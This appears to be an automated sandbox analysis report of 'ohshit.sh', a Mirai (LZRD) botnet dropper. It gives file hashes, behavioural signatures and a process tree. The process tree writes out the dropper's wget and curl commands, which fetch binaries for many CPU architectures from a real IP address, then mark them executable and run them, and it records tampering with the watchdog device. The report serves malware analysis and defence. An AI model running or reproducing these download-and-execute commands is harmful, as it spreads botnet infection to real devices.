Analysis
-
max time kernel
149s -
max time network
143s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
02/12/2024, 00:13
Static task
static1
Behavioral task
behavioral1
Sample
ohshit.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
ohshit.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
ohshit.sh
Resource
debian9-mipsbe-20240611-en
General
-
Target
ohshit.sh
-
Size
3KB
-
MD5
88738a95929e9c44969bcffde3c50f4b
-
SHA1
5b9581fadd1ea4b8621d5b0adb559a631b1226ee
-
SHA256
1b6a6ceb23e46cf0a36bb0f1fc89472f3ec42ea1b23ca15ffe49c39f8d9ea0f4
-
SHA512
df40b12ad937df1d3a36673761fe27b5c2072f1f871f37610e76987411c292f75b70035258ebf6f912d4f856ad014c0d67d461e87e71b939e127179c5bd985f9
Malware Config
Extracted
mirai
LZRD
Extracted
mirai
LZRD
Extracted
mirai
LZRD
Signatures
-
Mirai family
-
File and Directory Permissions Modification 1 TTPs 15 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 888 chmod 737 chmod 776 chmod 809 chmod 828 chmod 870 chmod 745 chmod 848 chmod 882 chmod 893 chmod 899 chmod 817 chmod 864 chmod 802 chmod 876 chmod -
Executes dropped EXE 15 IoCs
ioc pid Process /tmp/Abyss 738 Abyss /tmp/Abyss 746 Abyss /tmp/Abyss 777 Abyss /tmp/Abyss 803 Abyss /tmp/Abyss 810 Abyss /tmp/Abyss 818 Abyss /tmp/Abyss 829 Abyss /tmp/Abyss 850 Abyss /tmp/Abyss 865 Abyss /tmp/Abyss 871 Abyss /tmp/Abyss 877 Abyss /tmp/Abyss 883 Abyss /tmp/Abyss 889 Abyss /tmp/Abyss 894 Abyss /tmp/Abyss 900 Abyss -
Modifies Watchdog functionality 1 TTPs 2 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/watchdog Abyss File opened for modification /dev/misc/watchdog Abyss -
Enumerates running processes
Discovers information about currently running processes on the system
-
Writes file to system bin folder 2 IoCs
description ioc Process File opened for modification /sbin/watchdog Abyss File opened for modification /bin/watchdog Abyss -
resource yara_rule behavioral3/files/fstream-5.dat upx behavioral3/files/fstream-6.dat upx behavioral3/files/fstream-7.dat upx behavioral3/files/fstream-8.dat upx -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/813/cmdline Abyss File opened for reading /proc/857/cmdline Abyss File opened for reading /proc/861/cmdline Abyss File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/533/cmdline Abyss File opened for reading /proc/826/cmdline Abyss File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/839/cmdline Abyss File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/496/cmdline Abyss File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/832/cmdline Abyss File opened for reading /proc/532/cmdline Abyss File opened for reading /proc/822/cmdline Abyss File opened for reading /proc/842/cmdline Abyss File opened for reading /proc/885/cmdline Abyss File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/868/cmdline Abyss File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/853/cmdline Abyss File opened for reading /proc/865/cmdline Abyss File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/704/cmdline Abyss File opened for reading /proc/858/cmdline Abyss File opened for reading /proc/874/cmdline Abyss File opened for reading /proc/685/cmdline Abyss File opened for reading /proc/799/cmdline Abyss File opened for reading /proc/824/cmdline Abyss File opened for reading /proc/828/cmdline Abyss File opened for reading /proc/860/cmdline Abyss File opened for reading /proc/833/cmdline Abyss File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/859/cmdline Abyss File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/886/cmdline Abyss File opened for reading /proc/402/cmdline Abyss File opened for reading /proc/703/cmdline Abyss File opened for reading /proc/790/cmdline Abyss File opened for reading /proc/896/cmdline Abyss File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/900/cmdline Abyss File opened for reading /proc/705/cmdline Abyss File opened for reading /proc/706/cmdline Abyss File opened for reading /proc/815/cmdline Abyss File opened for reading /proc/786/cmdline Abyss File opened for reading /proc/837/cmdline Abyss File opened for reading /proc/873/cmdline Abyss File opened for reading /proc/867/cmdline Abyss File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/840/cmdline Abyss File opened for reading /proc/846/cmdline Abyss File opened for reading /proc/852/cmdline Abyss File opened for reading /proc/483/cmdline Abyss File opened for reading /proc/708/cmdline Abyss File opened for reading /proc/819/cmdline Abyss File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/820/cmdline Abyss File opened for reading /proc/855/cmdline Abyss File opened for reading /proc/filesystems cp File opened for reading /proc/879/cmdline Abyss File opened for reading /proc/891/cmdline Abyss -
System Network Configuration Discovery 1 TTPs 6 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 807 curl 808 cat 814 wget 815 curl 816 cat 806 wget -
Writes file to tmp directory 30 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.mips wget File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.arm7 curl File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.sparc curl File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.m68k curl File opened for modification /tmp/busybox cp File opened for modification /tmp/Abyss ohshit.sh File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.x86_64 wget File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.mips curl File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.arm5 curl File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.m68k wget File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.sh4 curl File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.x86 wget File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.mips64 curl File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.mpsl wget File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.mpsl curl File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.arm wget File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.i686 curl File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.x86 curl File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.arm curl File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.arm6 wget File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.arm6 curl File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.sh4 wget File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.ppc curl File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.arc curl File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.i686 wget File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.arm5 wget File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.arc wget File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.x86_64 curl File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.arm7 wget File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.ppc wget
Processes
-
/tmp/ohshit.sh/tmp/ohshit.sh1⤵
- Writes file to tmp directory
PID:706 -
/bin/cpcp /bin/busybox /tmp/2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:712
-
-
/usr/bin/wgetwget http://207.244.199.132/HideAbyss/ub8ehJSePAfc9FYqZIT6.arc2⤵
- Writes file to tmp directory
PID:715
-
-
/usr/bin/curlcurl -O http://207.244.199.132/HideAbyss/ub8ehJSePAfc9FYqZIT6.arc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:722
-
-
/bin/catcat ub8ehJSePAfc9FYqZIT6.arc2⤵PID:736
-
-
/bin/chmodchmod +x Abyss busybox ohshit.sh systemd-private-9ea5bc960d0a4062ac64e2e86dbfbbc9-systemd-timedated.service-xR9Dod ub8ehJSePAfc9FYqZIT6.arc2⤵
- File and Directory Permissions Modification
PID:737
-
-
/tmp/Abyss./Abyss2⤵
- Executes dropped EXE
PID:738
-
-
/usr/bin/wgetwget http://207.244.199.132/HideAbyss/ub8ehJSePAfc9FYqZIT6.x862⤵
- Writes file to tmp directory
PID:740
-
-
/usr/bin/curlcurl -O http://207.244.199.132/HideAbyss/ub8ehJSePAfc9FYqZIT6.x862⤵
- Reads runtime system information
- Writes file to tmp directory
PID:741
-
-
/bin/catcat ub8ehJSePAfc9FYqZIT6.x862⤵PID:744
-
-
/bin/chmodchmod +x Abyss busybox ohshit.sh systemd-private-9ea5bc960d0a4062ac64e2e86dbfbbc9-systemd-timedated.service-xR9Dod ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.x862⤵
- File and Directory Permissions Modification
PID:745
-
-
/tmp/Abyss./Abyss2⤵
- Executes dropped EXE
PID:746
-
-
/usr/bin/wgetwget http://207.244.199.132/HideAbyss/ub8ehJSePAfc9FYqZIT6.x86_642⤵
- Writes file to tmp directory
PID:749
-
-
/usr/bin/curlcurl -O http://207.244.199.132/HideAbyss/ub8ehJSePAfc9FYqZIT6.x86_642⤵
- Reads runtime system information
- Writes file to tmp directory
PID:760
-
-
/bin/catcat ub8ehJSePAfc9FYqZIT6.x86_642⤵PID:775
-
-
/bin/chmodchmod +x Abyss busybox ohshit.sh ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_642⤵
- File and Directory Permissions Modification
PID:776
-
-
/tmp/Abyss./Abyss2⤵
- Executes dropped EXE
PID:777
-
-
/usr/bin/wgetwget http://207.244.199.132/HideAbyss/ub8ehJSePAfc9FYqZIT6.i6862⤵
- Writes file to tmp directory
PID:781
-
-
/usr/bin/curlcurl -O http://207.244.199.132/HideAbyss/ub8ehJSePAfc9FYqZIT6.i6862⤵
- Reads runtime system information
- Writes file to tmp directory
PID:791
-
-
/bin/catcat ub8ehJSePAfc9FYqZIT6.i6862⤵PID:801
-
-
/bin/chmodchmod +x Abyss busybox ohshit.sh ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_642⤵
- File and Directory Permissions Modification
PID:802
-
-
/tmp/Abyss./Abyss2⤵
- Executes dropped EXE
PID:803
-
-
/usr/bin/wgetwget http://207.244.199.132/HideAbyss/ub8ehJSePAfc9FYqZIT6.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:806
-
-
/usr/bin/curlcurl -O http://207.244.199.132/HideAbyss/ub8ehJSePAfc9FYqZIT6.mips2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:807
-
-
/bin/catcat ub8ehJSePAfc9FYqZIT6.mips2⤵
- System Network Configuration Discovery
PID:808
-
-
/bin/chmodchmod +x Abyss busybox ohshit.sh ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_642⤵
- File and Directory Permissions Modification
PID:809
-
-
/tmp/Abyss./Abyss2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:810
-
-
/usr/bin/wgetwget http://207.244.199.132/HideAbyss/ub8ehJSePAfc9FYqZIT6.mips642⤵
- System Network Configuration Discovery
PID:814
-
-
/usr/bin/curlcurl -O http://207.244.199.132/HideAbyss/ub8ehJSePAfc9FYqZIT6.mips642⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:815
-
-
/bin/catcat ub8ehJSePAfc9FYqZIT6.mips642⤵
- System Network Configuration Discovery
PID:816
-
-
/bin/chmodchmod +x Abyss busybox ohshit.sh ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_642⤵
- File and Directory Permissions Modification
PID:817
-
-
/tmp/Abyss./Abyss2⤵
- Executes dropped EXE
PID:818
-
-
/usr/bin/wgetwget http://207.244.199.132/HideAbyss/ub8ehJSePAfc9FYqZIT6.mpsl2⤵
- Writes file to tmp directory
PID:819
-
-
/usr/bin/curlcurl -O http://207.244.199.132/HideAbyss/ub8ehJSePAfc9FYqZIT6.mpsl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:820
-
-
/bin/catcat ub8ehJSePAfc9FYqZIT6.mpsl2⤵PID:827
-
-
/bin/chmodchmod +x Abyss busybox ohshit.sh ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_642⤵
- File and Directory Permissions Modification
PID:828
-
-
/tmp/Abyss./Abyss2⤵
- Executes dropped EXE
PID:829
-
-
/usr/bin/wgetwget http://207.244.199.132/HideAbyss/ub8ehJSePAfc9FYqZIT6.arm2⤵
- Writes file to tmp directory
PID:833
-
-
/usr/bin/curlcurl -O http://207.244.199.132/HideAbyss/ub8ehJSePAfc9FYqZIT6.arm2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:839
-
-
/bin/catcat ub8ehJSePAfc9FYqZIT6.arm2⤵PID:847
-
-
/bin/chmodchmod +x Abyss busybox ohshit.sh ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_642⤵
- File and Directory Permissions Modification
PID:848
-
-
/tmp/Abyss./Abyss2⤵
- Executes dropped EXE
PID:850
-
-
/usr/bin/wgetwget http://207.244.199.132/HideAbyss/ub8ehJSePAfc9FYqZIT6.arm52⤵
- Writes file to tmp directory
PID:853
-
-
/usr/bin/curlcurl -O http://207.244.199.132/HideAbyss/ub8ehJSePAfc9FYqZIT6.arm52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:858
-
-
/bin/catcat ub8ehJSePAfc9FYqZIT6.arm52⤵PID:863
-
-
/bin/chmodchmod +x Abyss busybox ohshit.sh ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_642⤵
- File and Directory Permissions Modification
PID:864
-
-
/tmp/Abyss./Abyss2⤵
- Executes dropped EXE
PID:865
-
-
/usr/bin/wgetwget http://207.244.199.132/HideAbyss/ub8ehJSePAfc9FYqZIT6.arm62⤵
- Writes file to tmp directory
PID:867
-
-
/usr/bin/curlcurl -O http://207.244.199.132/HideAbyss/ub8ehJSePAfc9FYqZIT6.arm62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:868
-
-
/bin/catcat ub8ehJSePAfc9FYqZIT6.arm62⤵PID:869
-
-
/bin/chmodchmod +x Abyss busybox ohshit.sh ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.arm6 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_642⤵
- File and Directory Permissions Modification
PID:870
-
-
/tmp/Abyss./Abyss2⤵
- Executes dropped EXE
PID:871
-
-
/usr/bin/wgetwget http://207.244.199.132/HideAbyss/ub8ehJSePAfc9FYqZIT6.arm72⤵
- Writes file to tmp directory
PID:873
-
-
/usr/bin/curlcurl -O http://207.244.199.132/HideAbyss/ub8ehJSePAfc9FYqZIT6.arm72⤵
- Reads runtime system information
- Writes file to tmp directory
PID:874
-
-
/bin/catcat ub8ehJSePAfc9FYqZIT6.arm72⤵PID:875
-
-
/bin/chmodchmod +x Abyss busybox ohshit.sh ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.arm6 ub8ehJSePAfc9FYqZIT6.arm7 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_642⤵
- File and Directory Permissions Modification
PID:876
-
-
/tmp/Abyss./Abyss2⤵
- Executes dropped EXE
PID:877
-
-
/usr/bin/wgetwget http://207.244.199.132/HideAbyss/ub8ehJSePAfc9FYqZIT6.ppc2⤵
- Writes file to tmp directory
PID:879
-
-
/usr/bin/curlcurl -O http://207.244.199.132/HideAbyss/ub8ehJSePAfc9FYqZIT6.ppc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:880
-
-
/bin/catcat ub8ehJSePAfc9FYqZIT6.ppc2⤵PID:881
-
-
/bin/chmodchmod +x Abyss busybox ohshit.sh ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.arm6 ub8ehJSePAfc9FYqZIT6.arm7 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.ppc ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_642⤵
- File and Directory Permissions Modification
PID:882
-
-
/tmp/Abyss./Abyss2⤵
- Executes dropped EXE
PID:883
-
-
/usr/bin/wgetwget http://207.244.199.132/HideAbyss/ub8ehJSePAfc9FYqZIT6.sparc2⤵PID:885
-
-
/usr/bin/curlcurl -O http://207.244.199.132/HideAbyss/ub8ehJSePAfc9FYqZIT6.sparc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:886
-
-
/bin/catcat ub8ehJSePAfc9FYqZIT6.sparc2⤵PID:887
-
-
/bin/chmodchmod +x Abyss busybox ohshit.sh ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.arm6 ub8ehJSePAfc9FYqZIT6.arm7 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.ppc ub8ehJSePAfc9FYqZIT6.sparc ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_642⤵
- File and Directory Permissions Modification
PID:888
-
-
/tmp/Abyss./Abyss2⤵
- Executes dropped EXE
PID:889
-
-
/usr/bin/wgetwget http://207.244.199.132/HideAbyss/ub8ehJSePAfc9FYqZIT6.m68k2⤵
- Writes file to tmp directory
PID:890
-
-
/usr/bin/curlcurl -O http://207.244.199.132/HideAbyss/ub8ehJSePAfc9FYqZIT6.m68k2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:891
-
-
/bin/catcat ub8ehJSePAfc9FYqZIT6.m68k2⤵PID:892
-
-
/bin/chmodchmod +x Abyss busybox ohshit.sh ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.arm6 ub8ehJSePAfc9FYqZIT6.arm7 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.m68k ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.ppc ub8ehJSePAfc9FYqZIT6.sparc ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_642⤵
- File and Directory Permissions Modification
PID:893
-
-
/tmp/Abyss./Abyss2⤵
- Executes dropped EXE
PID:894
-
-
/usr/bin/wgetwget http://207.244.199.132/HideAbyss/ub8ehJSePAfc9FYqZIT6.sh42⤵
- Writes file to tmp directory
PID:896
-
-
/usr/bin/curlcurl -O http://207.244.199.132/HideAbyss/ub8ehJSePAfc9FYqZIT6.sh42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:897
-
-
/bin/catcat ub8ehJSePAfc9FYqZIT6.sh42⤵PID:898
-
-
/bin/chmodchmod +x Abyss busybox ohshit.sh ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.arm6 ub8ehJSePAfc9FYqZIT6.arm7 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.m68k ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.ppc ub8ehJSePAfc9FYqZIT6.sh4 ub8ehJSePAfc9FYqZIT6.sparc ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_642⤵
- File and Directory Permissions Modification
PID:899
-
-
/tmp/Abyss./Abyss2⤵
- Executes dropped EXE
PID:900
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
23KB
MD57fc3afdda7fbf993f43067a26cafed89
SHA14a422cc19b5c6ab0228cc94e3c0268cc54f720e3
SHA256e68832c656e933eea0904858518a31956bece42fc31b9ee9a8114331265ea93f
SHA512be1b011eccaa7c2dcac72c1c15805d00b864623f2e6466e48077720afc6601ff762530e0be201e58eb89ac0c479e9a87631bd123eb4d311f6ea7c4e2827c1dc6
-
Filesize
22KB
MD5fabfa526cad5319365ea6653e6f9ced8
SHA1136bc476e87c8abd1139876951b2f9d7d5987bac
SHA2561d527eb33d504aa5f19fc15da542a1e6911bc07d751ab4570ba49b159569681f
SHA5123aaae3ebc9f2c1e28eda4a8857f051f76666657436a77bbd13e3c2cc60bf2f9f3b5ecca984c84e6f43acc5fd14a0827c16926d55c52f4ca7df764a790cc065a0
-
Filesize
22KB
MD5e848aed4b617d3fb33d79bce6fbaa4c8
SHA1d000abf3da046f81749c2c79338c1cdc51ca3831
SHA25692f53ef0e5773a17e4d42f3ebe2d5a81269a59815ffd2cf7885051a28a7d8565
SHA51203d449908c04c08039f44db3f0b644b2582a87a64785a78b854f3605a0e640aa1b239891716270c566f9de8897c127fcc1bed8df85c80079070384d9e24623ba
-
Filesize
27KB
MD5f43afab6ef81a2d16e324d4fe443ce68
SHA121fa1cb8e027e3b00dcf6e7eda11108dab8383d6
SHA2566a27b0ad9aafa3dfe2757bfdbbfbc9f8c3a096167fe8754a82066db12081b395
SHA512352120f50e0771b84fd205f8d72b921161b2abdade2c4d831cbcaf90b19256ed26f465d3535408e35f210e57fbc8adf78a82c171a45ae2129fc8b5828bc12389
-
Filesize
71KB
MD5bfc7e472b8b0c8e43bd9afd78025f73b
SHA13c0d2a9c138cc4e2af2c5f00560fa95597f74d78
SHA2566654b606a7c6ccfa8635bd98709957fbd36def5abad3122282864e4bf4e2a095
SHA51276e4e3de635d92cc4f5c5dd7654a7324ba3440fff42ceec2fb883654f6a1da31f729a809a08a11e67ee82bd1b50eb592f9b6b6e1a59ba2605ded7b6dffd3fd52
-
Filesize
857KB
MD5a39fe8036e559ce804e26518061e59ff
SHA18df27f6e8a48b762d945ea2f2b87390c80acd4de
SHA2563180df117342646dcdc4c436f95b41e15587e2238ec59064b4b06c065d56cf38
SHA512e97756f316fceef7360e789362648529eea50eb6f7cc56cf654b3fc43ca61f0e4d9f366ed8fd59b73dd5a49615e935e9f53686d15f9a83c7fa472a70e7196d0d
-
Filesize
105KB
MD539984021963a3aa917b249460dd4ede1
SHA1d2637e855e891be1bd4c577682c2750352f21d8f
SHA256418c17efde9207470ca3fc2938947846419f95abf0c48e811a9c433bd93ef95d
SHA5124580ac52c4844114e59a6680fb1ca8928cfa0593fc069681245a5cc97efc84bba373a3e0d8eaf280adb33e7bdd1c61b99eedc0f66dccbfa64b17051bf75b1263